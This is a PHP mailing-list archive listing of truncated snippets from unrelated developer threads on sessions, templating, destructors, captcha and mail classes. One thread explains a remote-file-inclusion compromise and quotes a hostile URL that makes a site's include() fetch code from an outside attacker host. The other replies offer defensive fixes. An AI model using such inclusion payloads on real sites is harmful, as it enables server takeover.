Store everything in the database in an encrypted form.
Stuart Dallas wrote:
> On 22 Dec 2011, at 19:34, Paul M Foster
wrote:
>
>> I have concerns that the items in a
session buffer can be copied and
>> used to spoof legitimate
logins. This is harder to do when the info is
>> held in a
database
On 12/22/2011 2:54 PM, Stuart Dallas wrote:
On 22 Dec 2011, at 19:34, Paul M Foster wrote:
I have concerns that the items in a session buffer can be copied and
used to spoof legitimate logins. This is harder to do when the info is
held in a database.
Storing stuff in a database is no more s
On 22 Dec 2011, at 19:34, Paul M Foster wrote:
> I have concerns that the items in a session buffer can be copied and
> used to spoof legitimate logins. This is harder to do when the info is
> held in a database.
Storing stuff in a database is no more secure, it simply requires one single
extra
On Thu, Dec 22, 2011 at 12:55:41PM -0500, Al wrote:
>
>
> On 12/22/2011 10:05 AM, Paul M Foster wrote:
> >Not sure how to ask this question... I've always eschewed consulting a
> >database on page loads to determine if a user is logged in, primarily
> >because of latency issues. For example, you
On Mon, Sep 14, 2009 at 3:57 PM, Bastien Koert wrote:
> On Mon, Sep 14, 2009 at 3:29 PM, Marcus Gnaß wrote:
>> Tony Marston wrote:
>>
>>> You cannot do this in a separate class as it requires action in both the
>>> presentation (UI) and data access layers, and a single class is not allowed
>>> to
On Mon, Sep 14, 2009 at 3:29 PM, Marcus Gnaß wrote:
> Tony Marston wrote:
>
>> You cannot do this in a separate class as it requires action in both the
>> presentation (UI) and data access layers, and a single class is not allowed
>> to operate in more than one layer.
>
> You can, but you shouldn'
Tony Marston wrote:
> You cannot do this in a separate class as it requires action in both the
> presentation (UI) and data access layers, and a single class is not allowed
> to operate in more than one layer.
You can, but you shouldn't if you want to write your classes according
to the MVC pat
On Sun, Aug 9, 2009 at 9:29 AM, Sudheer
Satyanarayana wrote:
> Michael A. Peters wrote:
>>
>> Ralph Deffke wrote:
>>>
>>> good question !! I think the word "framework" is modern fashion term in
>>> the
>>> first case. in former days we used to say "library" C comes with a
>>> standard
>>> library,
Michael A. Peters wrote:
Ralph Deffke wrote:
good question !! I think the word "framework" is modern fashion term
in the
first case. in former days we used to say "library" C comes with a
standard
library, in modern words C comes with a standard framework. I use my own
framework, means I reuse
Ralph Deffke wrote:
good question !! I think the word "framework" is modern fashion term in the
first case. in former days we used to say "library" C comes with a standard
library, in modern words C comes with a standard framework. I use my own
framework, means I reuse my code written for similar
On Fri, Jul 24, 2009 at 2:27 AM, Lupus
Michaelis wrote:
> Andrew Ballard a écrit :
>>
>> I'm trying to profile a site on our development server to see why it
>> takes around 4 seconds to generate a pretty basic page.
>
> Last time I seen this is when I did validate DOM Document without DTD on
> lo
Just an idea: try using the (microtime(true) - $start) approach in
portions of code to try isolate the portion that is taking more time.
Sometimes that helps me to find "the" function that is slowing
everything down.
Jonathan
On Thu, Jul 23, 2009 at 6:18 PM, Andrew Ballard wrote:
> On Thu, Jul 23
On Thu, Jul 23, 2009 at 5:10 PM, Ben Dunlap wrote:
>> significant (around 46%), it says they only account for 193ms. What
>> could account for that much difference between what xdebug calculates
>> versus the total elapsed time?
>
> Are you counting "total elapsed time" from the perspective of the
On Mar 5, 2009, at 4:16 AM, Robert Cummings
wrote:
On Thu, 2009-03-05 at 03:08 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
function hiddenInput($document,$name,$value) {
$input = $document->createElement("input");
$input->setAttribute("type","hidden");
$input->setAttri
Robert Cummings wrote:
Is there a reason I shouldn't be doing it that way?
I didn't say you shouldn't. It's just expensive on every page request to
regenerate a document node by node. it also strikes me as tedious :/
It's definitely tedious - but I end up writing functions that do the
tedi
On Thu, 2009-03-05 at 03:08 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> >>
> >> function hiddenInput($document,$name,$value) {
> >> $input = $document->createElement("input");
> >> $input->setAttribute("type","hidden");
> >> $input->setAttribute("name",$name);
>
Robert Cummings wrote:
>>
>> function hiddenInput($document,$name,$value) {
>> $input = $document->createElement("input");
>> $input->setAttribute("type","hidden");
>> $input->setAttribute("name",$name);
>> $input->setAttribute("value",$value);
>> return($input);
>> }
>>
>
On Thu, 2009-03-05 at 02:04 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
> >> Robert Cummings wrote:
> >>> On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> > To punt wha
Robert Cummings wrote:
On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the t
On Wed, 2009-03-04 at 21:42 -0700, Nathan Nobbe wrote:
> On Wed, Mar 4, 2009 at 7:01 PM, Michael A. Peters wrote:
>
> > echoing html involves mixing html and php.
> > Using an XML class (like DOMDocument) to build the document does not.
>
>
> ive actually written a little templating system which
On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> >> Robert Cummings wrote:
> >>
> >>> To punt what is repeated over and over during runtime to a single
> >>> compilation phase when building the tem
On Wed, Mar 4, 2009 at 7:01 PM, Michael A. Peters wrote:
> Robert Cummings wrote:
>
>> On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
>>
>>> Robert Cummings wrote:
>>>
>>> To punt what is repeated over and over during runtime to a single
compilation phase when building the temp
Robert Cummings wrote:
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the template target. To simplify the use
of parameters so that they can be used in arbitra
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> >
> > To punt what is repeated over and over during runtime to a single
> > compilation phase when building the template target. To simplify the use
> > of parameters so that they can be used in arbitrary ord
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the template target. To simplify the use
of parameters so that they can be used in arbitrary order with default
values. To allow for the encapsulation of complex content in t
On Wed, 2009-03-04 at 12:15 -0700, Nathan Nobbe wrote:
> On Wed, Mar 4, 2009 at 11:51 AM, Robert Cummings wrote:
>
> > On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> > > Robert Cummings wrote:
> > > > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> > > >> Robert Cummings wro
On Wed, Mar 4, 2009 at 11:51 AM, Robert Cummings wrote:
> On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> > Robert Cummings wrote:
> > > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> > >> Robert Cummings wrote:
> > >>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote
On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> >> Robert Cummings wrote:
> >>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> Matthew Croud wrote:
> > Hello,
> >
> > First
Robert Cummings wrote:
> On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
>> Robert Cummings wrote:
>>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
Matthew Croud wrote:
> Hello,
>
> First post here, I'm in the process of learning PHP , I'm digesting a
> few
On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> Robert Cummings wrote:
> > On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> >> Matthew Croud wrote:
> >>> Hello,
> >>>
> >>> First post here, I'm in the process of learning PHP , I'm digesting a
> >>> few books as we speak.
> >>>
Robert Cummings wrote:
> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
>> Matthew Croud wrote:
>>> Hello,
>>>
>>> First post here, I'm in the process of learning PHP , I'm digesting a
>>> few books as we speak.
>>> I'm working on a content heavy website that provides a lot of
>>> informa
On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> Matthew Croud wrote:
> > Hello,
> >
> > First post here, I'm in the process of learning PHP , I'm digesting a
> > few books as we speak.
> > I'm working on a content heavy website that provides a lot of
> > information, a template system w
Hi
I think what you are looking for is static Header Footer and dynamic
content.
One way of doing this is by having the front controller pattern
For example : consider the following list of files in your application
1000.php
2000.php
1001.php
3000.php
In the front controller Pattern we usually
On Tue, 2009-03-03 at 20:53 +0100, Martin Zvarík wrote:
> Matthew Croud napsal(a):
> > Hello,
> >
> > First post here, I'm in the process of learning PHP , I'm digesting a
> > few books as we speak.
> > I'm working on a content heavy website that provides a lot of
> > information, a template sys
On Wed, Oct 22, 2008 at 2:29 PM, Stut <[EMAIL PROTECTED]> wrote:
>
> Never any issues this way? They always run without a hitch?
>>
>
> Not had any issues to far, and it's being used on some pretty busy sites
> and various PHP versions and several different web servers.
>
>
Terrific! Thanks for
On 22 Oct 2008, at 09:35, Jochem Maas wrote:
Stut schreef:
On 22 Oct 2008, at 00:22, Jochem Maas wrote:
Stut schreef:
I use destructors to update dirty objects in memcache.
care to eloborate ... sounds interesting.
Nothing complicated. The core objects in my application are all
cached
i
On 22 Oct 2008, at 14:42, Dan Joseph wrote:
On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
When a script ends everything is released (with some small
exceptions),
thus also all references to instances of classes.
Thus AFAIK a deconstructor will always be called at the end of
On Wed, Oct 22, 2008 at 9:42 AM, Dan Joseph <[EMAIL PROTECTED]> wrote:
> On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
>
>>
>>
When a script ends everything is released (with some small exceptions),
thus also all references to instances of classes.
Thus AFAIK a dec
On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
>
>
>>> When a script ends everything is released (with some small exceptions),
>>> thus also all references to instances of classes.
>>> Thus AFAIK a deconstructor will always be called at the end of script
>>> execution.
>>>
>>>
>>
Stut schreef:
> On 22 Oct 2008, at 00:22, Jochem Maas wrote:
>> Stut schreef:
>>> I use destructors to update dirty objects in memcache.
>>
>> care to eloborate ... sounds interesting.
>
> Nothing complicated. The core objects in my application are all cached
> in memcache. If anything changes in
On 22 Oct 2008, at 00:22, Jochem Maas wrote:
Stut schreef:
I use destructors to update dirty objects in memcache.
care to eloborate ... sounds interesting.
Nothing complicated. The core objects in my application are all cached
in memcache. If anything changes in an object it changes an int
Stut schreef:
> On 21 Oct 2008, at 22:08, Jochem Maas wrote:
>> Mike van Riel schreef:
>>> Dan Joseph wrote:
Hi,
I want to make sure I completely understand __destruct() and when its
hit...
Understand that it will run if all references to a particular object
are
>
On 21 Oct 2008, at 22:08, Jochem Maas wrote:
Mike van Riel schreef:
Dan Joseph wrote:
Hi,
I want to make sure I completely understand __destruct() and when
its
hit...
Understand that it will run if all references to a particular
object are
removed, but is that also true when a page ends
Mike van Riel schreef:
> Dan Joseph wrote:
>> Hi,
>>
>> I want to make sure I completely understand __destruct() and when its
>> hit...
>>
>> Understand that it will run if all references to a particular object are
>> removed, but is that also true when a page ends its execution?
>>
>> Example, I c
Small correction $i = 4, means the last photo not 5..
Not so important but still.:P
2008/5/1 Joep Roebroek <[EMAIL PROTECTED]>:
> This problem is getting stranger by the minute.
> I will explain in a little more detail what the script is actually for..
> It is an advert site and per advert, you
This problem is getting stranger by the minute.
I will explain in a little more detail what the script is actually for..
It is an advert site and per advert, you can add 5 photo's..
Now you set the $i = 2; When I set the $i (which indictates the index
of the photo, so $i = 5; is the last photo) my
Do you have a piece of example code that will reproduce the problem?
--
/James
On Thu, May 1, 2008 at 12:26 PM, Joep Roebroek <[EMAIL PROTECTED]> wrote:
> Strangely enough.. It does.. But I have also tried adding a letter
> (which gives me the good result) and then renaming it... But then the
>
Strangely enough.. It does.. But I have also tried adding a letter
(which gives me the good result) and then renaming it... But then the
value is wrong again :S
I've never had a problem like this.. Very strange..
2008/5/1 James Dempster <[EMAIL PROTECTED]>:
>
> $foldersystem = getcwd().'/test1';
returns exactly what I
want.
//attempt to create folder
mkdir($foldersystem);
chmod($foldersystem, 0777);
//save picture
if(!($handle = fopen($imagenamesmall, 'w'))){
echo "Cannot open file (31)";
exit;
}
This code works for me. How about you ?
--
/James
On Thu, May 1, 2008 at 11:04 AM,
On Tue, February 12, 2008 3:32 pm, Jason Pruim wrote:
>
> On Feb 12, 2008, at 4:24 PM, Daniel Brown wrote:
>
>> On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
>>> Browsers generally send the the HTTP_ACCEPT_LANGUAGE header in a
>>> request.
>>>
>>> $_SERVER[HTTP_ACCEPT_LANGUAGE]
On Feb 12, 2008, at 4:24 PM, Daniel Brown wrote:
On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
Browsers generally send the the HTTP_ACCEPT_LANGUAGE header in a
request.
$_SERVER[HTTP_ACCEPT_LANGUAGE] => en-gb,en;q=0.5
thus with mine, preference is en-gb, failing that an
On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
> Browsers generally send the the HTTP_ACCEPT_LANGUAGE header in a request.
>
> $_SERVER[HTTP_ACCEPT_LANGUAGE] => en-gb,en;q=0.5
>
> thus with mine, preference is en-gb, failing that anything en; failing
> that whatever you've got.
>
> Jason Pruim wrote:
On Feb 12, 2008, at 2:09 PM, Aleksandar Vojnovic wrote:
Could you explain this a little better - "...into using a database[1]
for storing the
pages and using browser sniffing to find out what language preference
they currently had
selected to display in that language"?
Jason,
If you don't mind I may give you an email off the list in a moment to
brain storm up a quick list of questions to ask clients and indeed
client "gotchas".
For the time being as this seems to be going down the line of how to
handle multilingual sites here's my two pennies.
XML, store
On Feb 12, 2008, at 2:09 PM, Aleksandar Vojnovic wrote:
Could you explain this a little better - "...into using a
database[1] for storing the
pages and using browser sniffing to find out what language
preference they currently had
selected to display in that language"?
Aleksandar
I'll t
Could you explain this a little better - "...into using a database[1]
for storing the
pages and using browser sniffing to find out what language preference
they currently had
selected to display in that language"?
Aleksandar
Quoting Jason Pruim <[EMAIL PROTECTED]>:
On Feb 12, 2008, at 1:0
Jason Pruim wrote:
>
> On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
>
>> Jason Pruim wrote:
>>> Hi Everyone,
>>> I know this isn't 100% on topic... But when is any post to this list
>>> 100% on topic? :)
>>> I've been doing some googling trying to find info on how to plan for
>>> what a webs
Jason Pruim <[EMAIL PROTECTED]> wrote:
>
> On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
>
> > Jason Pruim wrote:
> >> Hi Everyone,
> >> I know this isn't 100% on topic... But when is any post to this
> >> list 100% on topic? :)
> >> I've been doing some googling trying to find info
On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
Jason Pruim wrote:
Hi Everyone,
I know this isn't 100% on topic... But when is any post to this
list 100% on topic? :)
I've been doing some googling trying to find info on how to plan
for what a website needs. Stuff like Does it need a foru
Richard Lynch wrote:
> On Fri, January 18, 2008 10:41 am, Per Jessen wrote:
>> 2. check that the domain exists and has an MX.
>
> I believe this will foul you up...
>
> I *think* many domains just use their regular domain as MX if there is
> no MX.
We've been using the method on public forms fo
On Fri, January 18, 2008 10:41 am, Per Jessen wrote:
> 2. check that the domain exists and has an MX.
I believe this will foul you up...
I *think* many domains just use their regular domain as MX if there is
no MX.
And the Bad Guy can easily change tactics to use [EMAIL PROTECTED] or
whatever, o
> What does your form actually do? Does it email you, >email them, stick
> something in a DB? What?
>
The form sends an email to a listserv and cc's the sender and then enters
data into a database.
> Regardless, if they're entering a nonsense email address >and are
> managing to get your scr
Javier Huerta wrote:
> Thanks for all of your suggestions which all point to using Catpcha.
> I have actually already implemented Capchta and they are still getting
> around it. Even if they are entering it manually rather than via a
> bot, is there a way to check if the email address is of a spe
On 18 Jan 2008, at 16:01, Eric Butera wrote:
On Jan 18, 2008 10:55 AM, Javier Huerta <[EMAIL PROTECTED]>
wrote:
Thanks for all of your suggestions which all point to using
Catpcha. I have
actually already implemented Capchta and they are still getting
around it.
Even if they are entering i
On Jan 18, 2008 10:55 AM, Javier Huerta <[EMAIL PROTECTED]> wrote:
> Thanks for all of your suggestions which all point to using Catpcha. I have
> actually already implemented Capchta and they are still getting around it.
> Even if they are entering it manually rather than via a bot, is there a wa
On Tue, January 15, 2008 11:03 pm, Manuel Lemos wrote:
> Hello,
>
> on 01/16/2008 02:11 AM mike said the following:
>> Why not look at phpmailer? Probably more robust than some random
>> classes.
>
> I did not suggest any random classes. I developed those classes since
> 1999 and I know they work
mike said the following on 2008-1-16 12:11:
> Why not look at phpmailer? Probably more robust than some random classes.
>
> http://phpmailer.codeworxtech.com/
>
Thanks Mike. I will try both and tell you guys I like which one.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, vi
On 1/15/08, Manuel Lemos <[EMAIL PROTECTED]> wrote:
> You are missing my point. One thing is disliking somebody's work for
> whatever reasons, another this is acting disrespectfully and call it
> crappy in a public forum. If you don't know how to act respectfully with
> other PHP developers, I have
Hello,
on 01/16/2008 03:25 AM mike said the following:
> This list is democratic as well. Personal experience has led me there
> from many Google queries, and none of the code has been usable.
That does not give you the right to generalize and call all the code in
the site crappy, including the t
Hello,
on 01/16/2008 02:11 AM mike said the following:
> Why not look at phpmailer? Probably more robust than some random classes.
I did not suggest any random classes. I developed those classes since
1999 and I know they work reliably because they are used by me and tens
of thousands of users th
> -Original Message-
> From: mike [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, January 16, 2008 1:11 AM
> To: Wang Chen
> Cc: php-general@lists.php.net
> Subject: Re: [PHP] Re: [QUESTION] MAIL: Send a NOOP instead of DATA
>
> Why not look at phpmailer? Probab
This list is democratic as well. Personal experience has led me there
from many Google queries, and none of the code has been usable.
I give you props for creating a site and classes on it and such, but
this list is for people to ask and share opinions. I said it was not
to badmouth you but my per
Hello,
on 01/16/2008 02:11 AM mike said the following:
> Why not look at phpmailer? Probably more robust than some random classes.
I did not suggest any random classes. I developed those classes since
1999 and I know they work reliably because they are used by me and tens
of thousands of users th
Why not look at phpmailer? Probably more robust than some random classes.
http://phpmailer.codeworxtech.com/
Not to bash on Manuel, but I find phpclasses to be littered with lots
of crappy code and is too ad-laden and hard to use for me to bother.
On 1/15/08, Wang Chen <[EMAIL PROTECTED]> wrote:
On 4/11/07, Steve <[EMAIL PROTECTED]> wrote:
If you're working under an NDA or on code that doesn't belong to you, you'll
most likely need to hit up the hobbiest side of programming to build your
portfolio. Sit down, plan some app that would make your life easier (or
someone else's), go through t
Richard Lynch wrote:
On Tue, March 20, 2007 3:31 pm, Dan Shirah wrote:
Because in my application it is VERY VERY VERY important that I track
the
specific details for any given user in any given account. The user
data
changes frequently and I need to be able to track user information
changes,
nu
On Tue, March 20, 2007 3:31 pm, Dan Shirah wrote:
> Because in my application it is VERY VERY VERY important that I track
> the
> specific details for any given user in any given account. The user
> data
> changes frequently and I need to be able to track user information
> changes,
> numbers of a
On Tue, March 20, 2007 2:05 pm, Dan Shirah wrote:
> Each account is unique. It is possible that the same user could be on
> multiple accounts, therefore the account will be tied to the user each
> time.
If each account can have multiple users, AND each user can have
multiple accounts, then you ha
2007. 03. 20, kedd keltezéssel 16.31-kor Dan Shirah ezt írta:
> Because in my application it is VERY VERY VERY important that I track the
> specific details for any given user in any given account. The user data
> changes frequently and I need to be able to track user information changes,
> number
Because in my application it is VERY VERY VERY important that I track the
specific details for any given user in any given account. The user data
changes frequently and I need to be able to track user information changes,
numbers of accounts they are assigned to etc.
So rather than updating the
Dan Shirah wrote:
I had thought about having the multiple submissions on a single form, but
with the amount of user information that is collected and the variable
amount of users that may need to be entered this method would not be ideal.
(A single form that you have to scroll down a far way and
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote:
> Stut wrote:
>> Seak, Teng-Fong wrote:
>>> But after I've spent some time reading the log files, I've
>>> finally
>>> found out how the hackers managed to achieve worm infiltration.
>>>
>>> Actually, they're using an URL like this:
>>>
>
> Seak, Teng-Fong wrote:
> > No, I don't deserve anything because, as I've written in the
> > original post (but I suppose you didn't notice), the website is
> > outsourced and made by a 3rd company.
Then you should be having this conversation with the 3rd party. They need
to validate *EVERY*
Seak, Teng-Fong wrote:
> No, I don't deserve anything because, as I've written in the
> original post (but I suppose you didn't notice), the website is
> outsourced and made by a 3rd company.
Well, I've just realised (and checked) that I forgot to mention that
my company's website was outsource
> -Message d'origine-
> De : Richard Lynch [mailto:[EMAIL PROTECTED]
> Envoyé : mercredi 14 mars 2007 23:45
> À : Tim
> Cc : 'Haydar Tuna'; php-general@lists.php.net
> Objet : RE: [PHP] Re: question regarding form filtering
>
> On Wed, Marc
Turn off register_globals - if you pollute your scripts with global
variables like that you are asking for trouble. If you can't make sure you
clean the variable.
Using include("$page.php") is asking for trouble.
If you can get register_globals switched off (it's off by default in PHP5
for this
Stut wrote:
> Seak, Teng-Fong wrote:
>> But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>> Actually, they're using an URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-
On Wed, March 14, 2007 9:07 am, Tim wrote:
>> You almost for sure do *NOT* want to attempt to send the
>> entire Webster's 2nd Edition dictionary to the browser as JS
>> data so that the JS can check. :-)
>
> Hehe, oh? Really? ;-)
>
>> I suppose you could do a Web 2.0 Ajax-y thingie for that...
> -Message d'origine-
> De : Richard Lynch [mailto:[EMAIL PROTECTED]
> Envoyé : mercredi 14 mars 2007 09:48
> À : Tim
> Cc : 'Haydar Tuna'; php-general@lists.php.net
> Objet : RE: [PHP] Re: question regarding form filtering
>
> I personally
I personally would not presume that PHP and JS regex patterns are 100%
compatible...
Store a separate pattern for each.
And, actually, the PHP check might be more involved than the JS check.
For example, if the users is making up a password, and this password
has access to something that's actua
> -Message d'origine-
> De : Haydar Tuna [mailto:[EMAIL PROTECTED]
> Envoyé : mardi 13 mars 2007 14:53
> À : php-general@lists.php.net
> Objet : [PHP] Re: question regarding form filtering
>
> Hello,
>You can write some basic functions such as checking
> length of variable, re
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't
> related to the
> -Message d'origine-
> De : Stut [mailto:[EMAIL PROTECTED]
> Envoyé : vendredi 2 mars 2007 20:23
> À : Seak, Teng-Fong
> Cc : php-windows@lists.php.net; php-general@lists.php.net
> Objet : Re: [PHP] Re: Question on virus/worms
>
> Seak, Teng-Fong wrote:
>
Seak, Teng-Fong wrote:
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
And th
On Sun, 2007-01-07 at 19:39 +0100, [EMAIL PROTECTED] wrote:
> On 5 Jan 2007, [EMAIL PROTECTED] wrote:
>
> >
> > On Fri, 2007-01-05 at 22:07 +0100, Jochem Maas wrote:
> >> reply at the bottom ...
> >>
> >> (Karl Pflästerer) wrote:
> >> > Hi
> >> > let's say we have the follwing directory structur
Richard Lynch wrote:
> On Wed, June 28, 2006 5:07 pm, Jochem Maas wrote:
>> zend.ze1_compatibility_mode is next to useless in practice for
>> anything
>> but the most simple php4 OO code. certainly if you are wanting to
>> use php5 specific OO functionality like __destruct() you should not be
>> us
On Wed, June 28, 2006 5:07 pm, Jochem Maas wrote:
> zend.ze1_compatibility_mode is next to useless in practice for
> anything
> but the most simple php4 OO code. certainly if you are wanting to
> use php5 specific OO functionality like __destruct() you should not be
> using
> ze1_compatibility_mode
I tested on linux also and found no problem ...
Mathieu Dumoulin wrote:
> For all to know
>
> This bug is linux AND windows, the problem is caused when you have the
>
> zend.ze1_compatibility_mode = On
now it makes sense ... someone else offered a pretty good explanation
as to why you see the '
> For all to know
> This bug is linux AND windows, the problem is caused when you have the
> zend.ze1_compatibility_mode = On
> in the php.ini file. This is a bug that was reported before several
> times without having been resolved. I commented and reactiveated the bug
> on the php bug submissio
Thnx for the tip. I wanted debug features only for this function. So
working with debug_backtrace() was what I needed.
Thnx again,
Andrei
Richard Lynch wrote:
On Tue, January 31, 2006 6:40 am, Andrei wrote:
Well I know, I wanted to know if any1 did find a workaround...
To be more clear, sin
1 - 100 of 137 matches
Mail list logo